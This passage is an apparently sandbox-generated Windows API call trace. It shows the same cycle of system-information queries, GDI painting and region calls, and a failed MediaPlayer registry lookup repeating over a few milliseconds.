out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.772] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.772] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.772] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.772] BeginPath (hdc=0x0) returned 0 [0017.772] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.772] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.772] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.772] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.772] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.772] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.772] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.772] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2504027d [0017.772] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f040713 [0017.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d45 [0017.773] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d46 [0017.773] CombineRgn (hrgnDst=0x1040d45, hrgnSrc1=0x2504027d, hrgnSrc2=0x2f040713, iMode=1) returned 1 [0017.773] CombineRgn (hrgnDst=0x1040d46, hrgnSrc1=0x2504027d, hrgnSrc2=0x2f040713, iMode=4) returned 2 [0017.773] CreateSolidBrush (color=0xff) returned 0x2100d44 [0017.773] CreateSolidBrush (color=0xff0000) returned 0x1100d47 [0017.773] DeleteObject (ho=0x1100d47) returned 1 [0017.773] DeleteObject (ho=0x2f040713) returned 1 [0017.773] DeleteObject (ho=0x2504027d) returned 1 [0017.773] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.773] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.773] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.773] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.773] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.773] BeginPath (hdc=0x0) returned 0 [0017.773] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.773] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.773] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.773] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.773] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.773] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.773] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.773] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.773] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30040713 [0017.773] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2604027d [0017.773] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d48 [0017.773] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d49 [0017.773] CombineRgn (hrgnDst=0x1040d48, hrgnSrc1=0x30040713, hrgnSrc2=0x2604027d, iMode=1) returned 1 [0017.773] CombineRgn (hrgnDst=0x1040d49, hrgnSrc1=0x30040713, hrgnSrc2=0x2604027d, iMode=4) returned 2 [0017.773] CreateSolidBrush (color=0xff) returned 0x2100d47 [0017.774] CreateSolidBrush (color=0xff0000) returned 0x1100d4a [0017.774] DeleteObject (ho=0x1100d4a) returned 1 [0017.774] DeleteObject (ho=0x2604027d) returned 1 [0017.774] DeleteObject (ho=0x30040713) returned 1 [0017.774] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.774] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.774] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.774] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.774] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.774] BeginPath (hdc=0x0) returned 0 [0017.774] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.774] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.774] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.774] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.774] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.774] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.774] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.774] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.774] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2704027d [0017.774] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x31040713 [0017.774] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4b [0017.774] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4c [0017.774] CombineRgn (hrgnDst=0x1040d4b, hrgnSrc1=0x2704027d, hrgnSrc2=0x31040713, iMode=1) returned 1 [0017.774] CombineRgn (hrgnDst=0x1040d4c, hrgnSrc1=0x2704027d, hrgnSrc2=0x31040713, iMode=4) returned 2 [0017.774] CreateSolidBrush (color=0xff) returned 0x2100d4a [0017.774] CreateSolidBrush (color=0xff0000) returned 0x1100d4d [0017.774] DeleteObject (ho=0x1100d4d) returned 1 [0017.774] DeleteObject (ho=0x31040713) returned 1 [0017.774] DeleteObject (ho=0x2704027d) returned 1 [0017.775] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.775] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.775] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.775] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.775] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.775] BeginPath (hdc=0x0) returned 0 [0017.775] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.775] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.775] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.775] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.775] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.775] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.775] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.775] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x32040713 [0017.775] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2804027d [0017.775] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4e [0017.775] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4f [0017.775] CombineRgn (hrgnDst=0x1040d4e, hrgnSrc1=0x32040713, hrgnSrc2=0x2804027d, iMode=1) returned 1 [0017.775] CombineRgn (hrgnDst=0x1040d4f, hrgnSrc1=0x32040713, hrgnSrc2=0x2804027d, iMode=4) returned 2 [0017.775] CreateSolidBrush (color=0xff) returned 0x2100d4d [0017.775] CreateSolidBrush (color=0xff0000) returned 0x1100d50 [0017.775] DeleteObject (ho=0x1100d50) returned 1 [0017.775] DeleteObject (ho=0x2804027d) returned 1 [0017.775] DeleteObject (ho=0x32040713) returned 1 [0017.775] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.775] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.776] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.776] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.776] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.776] BeginPath (hdc=0x0) returned 0 [0017.776] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.776] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.776] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.776] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.776] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.776] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.776] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.776] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2904027d [0017.776] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x33040713 [0017.776] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d51 [0017.776] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d52 [0017.776] CombineRgn (hrgnDst=0x1040d51, hrgnSrc1=0x2904027d, hrgnSrc2=0x33040713, iMode=1) returned 1 [0017.776] CombineRgn (hrgnDst=0x1040d52, hrgnSrc1=0x2904027d, hrgnSrc2=0x33040713, iMode=4) returned 2 [0017.776] CreateSolidBrush (color=0xff) returned 0x2100d50 [0017.776] CreateSolidBrush (color=0xff0000) returned 0x1100d53 [0017.776] DeleteObject (ho=0x1100d53) returned 1 [0017.776] DeleteObject (ho=0x33040713) returned 1 [0017.776] DeleteObject (ho=0x2904027d) returned 1 [0017.776] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.776] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.776] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.776] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.776] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.777] BeginPath (hdc=0x0) returned 0 [0017.777] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.777] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.777] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.777] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.777] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.777] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.777] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.777] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x34040713 [0017.777] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a04027d [0017.777] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d54 [0017.777] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d55 [0017.777] CombineRgn (hrgnDst=0x1040d54, hrgnSrc1=0x34040713, hrgnSrc2=0x2a04027d, iMode=1) returned 1 [0017.777] CombineRgn (hrgnDst=0x1040d55, hrgnSrc1=0x34040713, hrgnSrc2=0x2a04027d, iMode=4) returned 2 [0017.777] CreateSolidBrush (color=0xff) returned 0x2100d53 [0017.777] CreateSolidBrush (color=0xff0000) returned 0x1100d56 [0017.777] DeleteObject (ho=0x1100d56) returned 1 [0017.777] DeleteObject (ho=0x2a04027d) returned 1 [0017.777] DeleteObject (ho=0x34040713) returned 1 [0017.777] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.777] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.777] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.777] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.777] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.777] BeginPath (hdc=0x0) returned 0 [0017.777] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.778] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.778] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.778] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.778] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.778] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.778] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.778] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b04027d [0017.778] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x35040713 [0017.778] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d57 [0017.778] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d58 [0017.778] CombineRgn (hrgnDst=0x1040d57, hrgnSrc1=0x2b04027d, hrgnSrc2=0x35040713, iMode=1) returned 1 [0017.778] CombineRgn (hrgnDst=0x1040d58, hrgnSrc1=0x2b04027d, hrgnSrc2=0x35040713, iMode=4) returned 2 [0017.778] CreateSolidBrush (color=0xff) returned 0x2100d56 [0017.778] CreateSolidBrush (color=0xff0000) returned 0x1100d59 [0017.778] DeleteObject (ho=0x1100d59) returned 1 [0017.778] DeleteObject (ho=0x35040713) returned 1 [0017.778] DeleteObject (ho=0x2b04027d) returned 1 [0017.778] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.778] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.778] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.778] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.778] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.778] BeginPath (hdc=0x0) returned 0 [0017.778] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.778] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.778] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.778] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.778] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.778] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.779] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.779] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.779] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x36040713 [0017.779] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c04027d [0017.779] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5a [0017.779] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5b [0017.779] CombineRgn (hrgnDst=0x1040d5a, hrgnSrc1=0x36040713, hrgnSrc2=0x2c04027d, iMode=1) returned 1 [0017.779] CombineRgn (hrgnDst=0x1040d5b, hrgnSrc1=0x36040713, hrgnSrc2=0x2c04027d, iMode=4) returned 2 [0017.779] CreateSolidBrush (color=0xff) returned 0x2100d59 [0017.779] CreateSolidBrush (color=0xff0000) returned 0x1100d5c [0017.779] DeleteObject (ho=0x1100d5c) returned 1 [0017.779] DeleteObject (ho=0x2c04027d) returned 1 [0017.779] DeleteObject (ho=0x36040713) returned 1 [0017.779] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.779] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.779] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.779] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.779] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.779] BeginPath (hdc=0x0) returned 0 [0017.779] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.779] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.779] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.779] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.779] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.779] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.780] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.780] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d04027d [0017.780] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x37040713 [0017.780] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5d [0017.780] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5e [0017.780] CombineRgn (hrgnDst=0x1040d5d, hrgnSrc1=0x2d04027d, hrgnSrc2=0x37040713, iMode=1) returned 1 [0017.780] CombineRgn (hrgnDst=0x1040d5e, hrgnSrc1=0x2d04027d, hrgnSrc2=0x37040713, iMode=4) returned 2 [0017.780] CreateSolidBrush (color=0xff) returned 0x2100d5c [0017.780] CreateSolidBrush (color=0xff0000) returned 0x1100d5f [0017.780] DeleteObject (ho=0x1100d5f) returned 1 [0017.780] DeleteObject (ho=0x37040713) returned 1 [0017.780] DeleteObject (ho=0x2d04027d) returned 1 [0017.780] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.780] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.780] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.780] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.780] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.780] BeginPath (hdc=0x0) returned 0 [0017.780] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.780] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.780] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.780] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.780] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: 